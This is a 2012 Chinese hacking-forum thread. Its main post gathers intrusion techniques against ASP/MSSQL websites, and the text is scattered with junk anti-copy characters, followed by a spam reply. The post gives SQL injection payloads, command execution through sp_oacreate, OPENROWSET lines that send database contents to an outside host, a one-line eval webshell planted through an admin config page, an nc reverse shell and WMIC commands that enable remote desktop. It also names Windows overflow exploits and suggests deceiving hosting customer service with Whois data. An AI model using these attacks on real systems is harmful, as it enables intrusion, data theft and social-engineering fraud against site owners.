找回密码
 立即注册
查看: 4657|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关
' H: b8 \% m( [) b* _. }( Z7 j8 R& `% \" v0 i" n  f$ ]) R: [

$ m8 @) l3 Q9 H$ A; ~1 [" ?, s9 KSA点数据库分离搞法+语句:$ `; ]3 x( k6 }& T! ~* U# h9 e% x

) V- Z- D& g; b8 O5 e6 Q+ C注射点不显错,执行下面三条语句页面都返回正常。" y4 v2 }4 {$ G/ d, j" d
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
  ]7 k  u: A; y9 P) `0 n  F- Y" Eand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
3 q+ n- {! |* a& ?2 I* Iand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')' z$ U0 [, z$ H& N  W0 t3 E; S3 q  r
可以列目录,判断系统为2000,web与数据库分离
' I2 \0 O) X9 b3 S2 P/ |, N遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。6 P. v' h% _$ c" _. C- f7 g
在注射点上执行4 N( n/ I/ n$ d$ X- K  H* [  t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
3 l( W4 B: W9 V页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
9 z0 `( H# Q$ A; P% B还有我用NC监听得其他端口都没有得到IP。7 n( h. h+ B& U
3 u$ r$ C" f6 u5 S. |" \
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
- Z. T2 f- h4 q3 j& I4 P' z'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--9 T2 s. C9 T9 B$ q+ H/ x

7 ?" ^; D& l: T" r1 e3 };insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
+ U) I# [% @' m: H5 ]( A( Y* F" k9 w; f3 Z& n  c
现在就猜想是不是数据库是内网而且不能连外网。
, e6 r# `$ h9 P8 s% }& I. {& U% k- \  z) q2 t* y

0 x' ^9 B8 c5 y$ Yaccess导出txt文本代码
" L# M# _. g( iSELECT * into [test.txt] in 'd:\web\' 'text;' from admin4 I5 J2 h% N" B$ A/ N

! w3 v! w% f/ e0 h. t
1 J8 ~1 E  z3 d( t6 s; l) z' g/ x
0 G  l' }' s) j9 x* [# j自动跳转到指定网站代码头
2 N  e* F, L0 B<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
  ~5 u9 l0 L5 c; ]# K8 u0 X) S' ?" P- a4 C

+ F- K- B8 F( R& `. D入侵java or jsp站点时默认配置文件路径:0 T" `! ^8 u2 g
\web-inf\web.xml
' Q3 x2 r7 V% B  I% `* B2 qtomcat下的配置文件位置:0 G) R6 r2 L# U- ?
\conf\server.xml            (前面加上tomcat路径)
; q7 L+ U$ }& X4 t# y' N\Tomcat 5.0\webapps\root\web-inf\struts-config.xml; T1 i: \, X1 R6 L, F' m& \

% [4 j$ a3 q0 _. B
$ {" j! g# \" L# w$ f9 O5 [( F7 K! z5 r
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
! G3 Q5 r+ o% a-1%23
+ b6 I7 ?7 r4 f# Q! ?>
5 {! z1 z& h" a3 }$ q0 N3 E<
: c  i4 O" `% [) {5 ?+ e1'+or+'1'='1
' n+ V8 }! e9 Y- s& e/ w/ A! v4 mid=8%bf
- ]( J& M! i4 ^4 G) a! t, T
0 q$ r# O7 x7 r/ n! t全新注入点检测试法:% l" Z) N3 \5 t" J
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
/ A5 e/ f- O( c% s& G" }0 Y9 K5 _
' W1 C) L- z+ x3 a& _8 `* W" {' J2 U在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。- [7 M% g4 u9 N2 V7 M
- E6 `$ {3 g1 E" [6 d
搜索型注入判断方法:
2 g5 J' z2 S* U! F2 K, i* M北京%' and '1'='1' and '%'='! X; B) D- r& S) @4 R* W- H
北京%' and '1'='2' and '%'='
! |* p7 R9 P2 k4 Y( P' P1 p+ @
$ w: n1 e* M$ f1 y, C5 p  \: g# R# O9 [6 p
COOKIES注入:) k8 |/ _0 y8 M" _

/ Q+ r( ^+ Z( P- ~javascript:alert(document.cookie="id="+escape("51 and 1=1"));
  r+ {: k& p5 ^
  a$ d: M* L$ q$ o3 Q' n6 \, D2000专业版查看本地登录用户命令:1 B' c% q* r+ e
net config workstation
, f5 C# l3 {7 D2 ^' c5 O/ z) z0 m" g4 F* _
. X; L% M- i' e. n/ t8 I8 {8 \
2003下查看ipsec配置和默认防火墙配置命令:
8 z  u) y7 E- I: Bnetsh firewall show config
4 z% U2 t) |% e; S) n$ u/ n* dnetsh ipsec static show all, ]( N. Y) y% n, ]. g; P% |
, [5 C9 ~" b* O
不指派指定策略命令:
7 z% F; r5 z  m/ [8 N( u  Gnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名), Q8 h, R0 P/ K8 y$ H; \) y' R/ K
netsh ipsec static show policy all  显示策略名! S8 u& m2 ]  H. P8 k! d3 O# E! M+ m
# S# F' n: V9 B' \. j* ?4 U
" C) I: U2 b5 m, d6 R" G% H
猜管理员后台小技巧:" [0 T+ C8 B* S! u6 L1 C
admin/left.asp 0 e) }9 a' ^  `
admin/main.asp
+ E$ g; s% s& o0 \/ `4 |" Aadmin/top.asp
* i$ w7 o- H$ i' {, \# |; Hadmin/admin.asp
6 b) P0 d5 T, Q/ R" ?会现出菜单导航,然后迅雷下载全部链接+ M; x: N: y. a) \

  h/ P4 B3 A1 U) x. l6 f, {" R0 l' k3 |
社会工程学:
8 I5 k2 p8 s+ m6 M- E用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人+ F$ c! Y- l% |/ _8 c. B
然后去骗客服( W2 H8 D: d9 s' s0 ~

" B0 E- E" M8 [; Y
8 M& p5 _1 K% }3 E4 `) c统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
/ _  e  Z9 O% G查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, ' }# J# j3 G# ?6 C7 p
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
" Y1 Y3 \  D2 b1 U0 ~5 m! q; a( \9 U) R6 ~- f" C5 L" Q, j5 t/ M, ^
4 Y/ D2 T. }* ^! }
- ~8 J3 Q3 M0 h2 l3 I0 S. C4 Y
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)6 z. u0 n/ z6 c

( s1 {8 G# a) X/ S. }9 j3 z" g, F) ^- J  u2 ^2 `$ y
) Z! a4 B) w* j) n
CMD加密注册表位置- t/ m8 d: T, N, u( t$ E3 q5 a
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor) G5 U" \) Q+ h! s- |& y4 k
AutoRun$ n  C- b. d1 L0 M# ?1 @% v% Y5 e
; r9 }6 I9 Z& O7 e3 i
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor9 R0 M4 W" n" S! d* P
AutoRun
6 Q6 i* t3 ]- |- u. |7 X4 q% o* Z0 N, b* K7 ^
  E  m2 {5 H  u/ ]9 `5 o* w- D
在找注入时搜索Hidden,把他改成test" s+ W1 ]' J, B
. f: l/ L. C- l" U

( s/ m- g4 l# B( `6 Z3 E. G5 [5 Y2 t+ U/ f' G
mstsc /v:IP /console " c- H7 g3 J4 I% q2 \) h3 T- n' x
8 Q( X8 `; ~% B6 J( s

2 T2 i! U" \6 S( f8 A$ G* X一句话开3389:! \4 e, t3 I/ v+ {8 W
& z# a1 |! I' z
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  2 |' z+ ]- \. k' _( i
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
; U' j4 }( _. l9 b4 _: ~; O$ `( }% k4 D

# `9 G1 L. q# j$ t知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
0 L  o; R, j" i# QInsert into admin(user,pwd) values('test','test')% V* G/ D4 E: s0 c) a5 `% \

8 l; ?- o, Y9 g" ]8 b$ X' _( \
NC反弹8 W; U. d* K' L! N
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   - R6 z+ @/ e8 q: l% d
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
1 b% v3 M0 A- E4 G0 t5 r  t1 L# a1 C9 J
" \% i- v9 [3 o! E/ v
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
9 `2 ^1 f; s' @: G1 P! ~
& {% d6 H! Q4 s$ i/ v' N; z有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
4 S, p8 O3 s. w1 ?9 ~% Y5 X8 q3 H" n例如:
$ v+ O' `- E0 S; {# xsubst k: d:\www\ 用d盘www目录替代k盘
$ z; r1 U0 V. S2 z! `subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表